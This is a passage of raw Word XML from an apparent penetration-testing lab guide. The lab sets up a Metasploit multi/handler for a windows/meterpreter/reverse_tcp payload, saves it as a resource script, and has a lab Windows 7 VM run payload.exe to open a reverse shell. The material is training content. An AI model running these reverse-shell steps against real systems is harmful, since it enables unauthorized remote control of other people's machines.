      <w:r>
        <w:t xml:space="preserve"> Metasploit has numerous scripts already developed and stored here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119D4D9D" w14:textId="77777777" w:rsidR="00075467" w:rsidRPr="00075467" w:rsidRDefault="00075467" w:rsidP="00075467">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploring Resource Scripts in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB73336" w14:textId="498FBE45" w:rsidR="00075467" w:rsidRPr="00075467" w:rsidRDefault="00075467" w:rsidP="00075467">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075467">
        <w:t>Metasploit store</w:t>
      </w:r>
      <w:r w:rsidR="00984E60">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t xml:space="preserve"> its </w:t>
      </w:r>
      <w:r w:rsidR="00984E60">
        <w:t xml:space="preserve">resource </w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t>scripts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984E60">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the following location. If we</w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t xml:space="preserve"> navigate to </w:t>
      </w:r>
      <w:r w:rsidR="00984E60" w:rsidRPr="00C747C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00984E60" w:rsidRPr="00C747C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>rc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00984E60" w:rsidRPr="00C747C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> script location </w:t>
      </w:r>
      <w:r w:rsidR="00984E60" w:rsidRPr="00075467">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984E60">
        <w:t xml:space="preserve">do </w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00984E60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984E60" w:rsidRPr="00C747C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
      <w:r w:rsidR="00984E60">
        <w:t xml:space="preserve"> to view the contents of the directory, we can see there are </w:t>
      </w:r>
      <w:r w:rsidR="00984E60" w:rsidRPr="00984E60">
        <w:t xml:space="preserve">numerous scripts already developed and stored here. </w:t>
      </w:r>
      <w:r w:rsidR="00C747C7" w:rsidRPr="00C747C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Our new </w:t>
      </w:r>
      <w:r w:rsidR="00984E60" w:rsidRPr="00C747C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">script will be </w:t>
      </w:r>
      <w:r w:rsidR="009707DB" w:rsidRPr="00C747C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saved to our working folder</w:t>
      </w:r>
      <w:r w:rsidR="00984E60" w:rsidRPr="00C747C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41347AC7" w14:textId="66E3AFA4" w:rsidR="00075467" w:rsidRDefault="00075467" w:rsidP="00075467">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-framework/scripts/resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:br/>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06651F4A" w14:textId="179A8527" w:rsidR="00075467" w:rsidRPr="00984E60" w:rsidRDefault="00984E60" w:rsidP="0007546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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4245234C" wp14:editId="5BE91369">
            <wp:extent cx="4343400" cy="4343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270" cy="435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4A524" w14:textId="7B36BF73" w:rsidR="00075467" w:rsidRPr="00075467" w:rsidRDefault="00075467" w:rsidP="00075467">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>e need to set up a multi/handler to connect to when a payload is executed on a target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F70B9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turn to your Kali terminal, and at the prompt, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB479F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D504F" w14:textId="7F830144" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB479F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63160622" wp14:editId="5EF64175">
            <wp:extent cx="4153480" cy="5906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8665" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRPr="0063489C" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt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1196A42B" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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283A100E" wp14:editId="5686A7CD">
            <wp:extent cx="2829320" cy="4001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4B713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A90293F" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRPr="0063489C" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B2B74" w14:textId="49481608" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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6E03E97" wp14:editId="63CDD589">
            <wp:extent cx="5734850" cy="64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20B91" w14:textId="77777777" w:rsidR="00075467" w:rsidRDefault="00075467" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310EEB9D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Press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2471C439" w14:textId="4C066CC2" w:rsidR="007E78BF" w:rsidRPr="00075467" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:i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IP address for your LHOST using the IP address assigned you to Kali install. At the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LHOST 10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="00D8120D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00075467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r w:rsidR="00075467" w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(This will be the IP address of your Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B817E8C" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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6A85C8D3" wp14:editId="2976419D">
            <wp:extent cx="5763429" cy="88594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09168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4F3726BC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port number for the listening port to 4444. At the prompt, type, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D5E021" w14:textId="5178F422" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0063489C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0063489C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="283A9E36" w14:textId="3B8FB466" w:rsidR="00F46A87" w:rsidRPr="00F46A87" w:rsidRDefault="00F46A87" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46A87">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We are ready to save the new resource script to </w:t>
      </w:r>
      <w:r w:rsidR="009707DB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">our working folder. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5D79C" w14:textId="00D54978" w:rsidR="00F46A87" w:rsidRPr="0063489C" w:rsidRDefault="00F46A87" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>makerc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handler_t</w:t>
      </w:r>
      <w:r w:rsidR="00E0789A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p.rc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5503FFB2" w14:textId="17584FDA" w:rsidR="007E78BF" w:rsidRDefault="00E0789A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ACEE847" wp14:editId="04ADB729">
            <wp:extent cx="5934710" cy="1389380"/>
            <wp:effectExtent l="0" t="0" r="889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85E9B" w14:textId="54E94667" w:rsidR="00F46A87" w:rsidRDefault="00F46A87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dit the script and add the run command</w:t>
      </w:r>
      <w:r w:rsidR="009707DB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the very end. From the taskbar of your text editor, open File and click on Save. Close the working directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8EFDA8" w14:textId="3C05D183" w:rsidR="009707DB" w:rsidRDefault="00E0789A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0A218D0D" wp14:editId="68D4852C">
            <wp:extent cx="5937885" cy="2826385"/>
            <wp:effectExtent l="0" t="0" r="571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82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AF824" w14:textId="6AAC241E" w:rsidR="009707DB" w:rsidRPr="009707DB" w:rsidRDefault="009707DB" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009707DB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch the new resource script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B6B610" w14:textId="68F27A39" w:rsidR="009707DB" w:rsidRDefault="009707DB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pen a new terminal inside your working directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3947C90E" w14:textId="4FEDC67E" w:rsidR="009707DB" w:rsidRDefault="009707DB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o launch </w:t>
      </w:r>
      <w:r w:rsidR="00E0789A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> new meterpreter script, at the terminal prompt, type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFCF31B" w14:textId="0ADCF0EB" w:rsidR="009707DB" w:rsidRDefault="009707DB" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009707DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009707DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handler_t</w:t>
      </w:r>
      <w:r w:rsidR="00E0789A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="009707DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p.rc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69998943" w14:textId="22CB1834" w:rsidR="009707DB" w:rsidRDefault="00E0789A" w:rsidP="007E78BF">
      <w:pPr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noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476817C7" wp14:editId="202ABE16">
            <wp:extent cx="2755265" cy="878840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265" cy="87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A78D3" w14:textId="789B8F55" w:rsidR="009707DB" w:rsidRPr="009707DB" w:rsidRDefault="009707DB" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009707DB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/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2FC02280" w14:textId="3A8A3A3D" w:rsidR="00F46A87" w:rsidRDefault="00E0789A" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0789A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E915B1" wp14:editId="7FF217D7">
            <wp:extent cx="5582429" cy="1886213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DE70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Kali is now waiting patiently for our Windows 7 Pro victim to launch the payload.exe file and establish a reverse shell using a Meterpreter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D384861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Return to your Windows 7 Pro machine. Open the Documents folder and 2X click the payload.exe file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D74F9" w14:textId="318112EC" w:rsidR="007E78BF" w:rsidRDefault="00E74145" w:rsidP="007E78BF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3FBFAD7E" wp14:editId="376F98BC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D5617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459C7DD5" w14:textId="5EAEAB25" w:rsidR="007E78BF" w:rsidRDefault="00E74145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AC23F33" wp14:editId="3FB8D209">
            <wp:extent cx="3305908" cy="2462842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4272D" w14:textId="77777777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11AFB82D" w14:textId="215183EB" w:rsidR="007E78BF" w:rsidRDefault="00E74145" w:rsidP="007E78BF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4F3E85D1" wp14:editId="5787366A">
            <wp:extent cx="5943600" cy="1819910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2D1FC" w14:textId="77777777" w:rsidR="00B97DFA" w:rsidRDefault="00B97DFA" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44407DC2" w14:textId="13FEA955" w:rsidR="007E78BF" w:rsidRPr="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E78BF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D394D1F" w14:textId="450EAFFE" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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first lab of the section, </w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ou have established a reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a resource script file. You also learned how to create a payload using msfvenom. We now have a Windows 7 Pro machine ready for post</w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploitation and a quick and easy way to establish a meterpreter session as needed</w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get the job done remotely</w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4046A33E" w14:textId="402735C3" w:rsidR="00B97DFA" w:rsidRPr="00B97DFA" w:rsidRDefault="00B97DFA" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97DFA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>End of the lab!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19467775" w14:textId="3A506FA2" w:rsidR="00A51DF4" w:rsidRPr="00A51DF4" w:rsidRDefault="00A51DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A51DF4" w:rsidRPr="00A51DF4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61004" w14:textId="77777777" w:rsidR="0010028A" w:rsidRDefault="0010028A" w:rsidP="00A94B5D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="463F3992" w14:textId="77777777" w:rsidR="0010028A" w:rsidRDefault="0010028A" w:rsidP="00A94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Linotype-Roman">
    <w:altName w:val="Palatino Linotype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33552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A2AB24" w14:textId="24013AC4" w:rsidR="00A94B5D" w:rsidRDefault="00A94B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AC8099" w14:textId="77777777" w:rsidR="00A94B5D" w:rsidRDefault="00A94B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AF993" w14:textId="77777777" w:rsidR="0010028A" w:rsidRDefault="0010028A" w:rsidP="00A94B5D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0867A807" w14:textId="77777777" w:rsidR="0010028A" w:rsidRDefault="0010028A" w:rsidP="00A94B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876F9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C350506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6704B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C05E8AB6"/>
    <w:lvl w:ilvl="0" w:tplc="A54CF19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Dc2sDSwMDE3NjFU0lEKTi0uzszPAykwrgUACAL7lywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00A51DF4"/>
    <w:rsid w:val="00075467"/>
    <w:rsid w:val="00083DB9"/>
    <w:rsid w:val="0010028A"/>
    <w:rsid w:val="00183548"/>
    <w:rsid w:val="002040C9"/>
    <w:rsid w:val="002843B6"/>
    <w:rsid w:val="005204D4"/>
    <w:rsid w:val="00607F2B"/>
    <w:rsid w:val="00732FB7"/>
    <w:rsid w:val="007552CC"/>
    <w:rsid w:val="007E78BF"/>
    <w:rsid w:val="00882764"/>
    <w:rsid w:val="009707DB"/>
    <w:rsid w:val="00984E60"/>
    <w:rsid w:val="00A51DF4"/>
    <w:rsid w:val="00A66F1D"/>
    <w:rsid w:val="00A829BE"/>
    <w:rsid w:val="00A94B5D"/>
    <w:rsid w:val="00B97DFA"/>
    <w:rsid w:val="00BB5CFD"/>
    <w:rsid w:val="00BD10D9"/>
    <w:rsid w:val="00C747C7"/>
    <w:rsid w:val="00CA7B51"/>
    <w:rsid w:val="00CE1AB5"/>
    <w:rsid w:val="00D8120D"/>
    <w:rsid w:val="00DF7FD0"/>
    <w:rsid w:val="00E0789A"/>
    <w:rsid w:val="00E74145"/>
    <w:rsid w:val="00F178D6"/>
    <w:rsid w:val="00F4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1C8D0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AF869640-D7E1-4B95-8A80-35DDBF7E4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51DF4"/>
    <w:rPr>
      <w:rFonts w:ascii="PalatinoLinotype-Roman" w:hAnsi="PalatinoLinotype-Roman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CA7B5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E78B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7E78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4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B5D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A94B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82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customXml" Target="../customXml/item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10.0.2.15/payload.exe" TargetMode="External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40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7E3B9819-5814-471A-9CD1-145B0F9022FF}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6136CC85-2AC6-4568-A58B-023DC71A4C2E}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
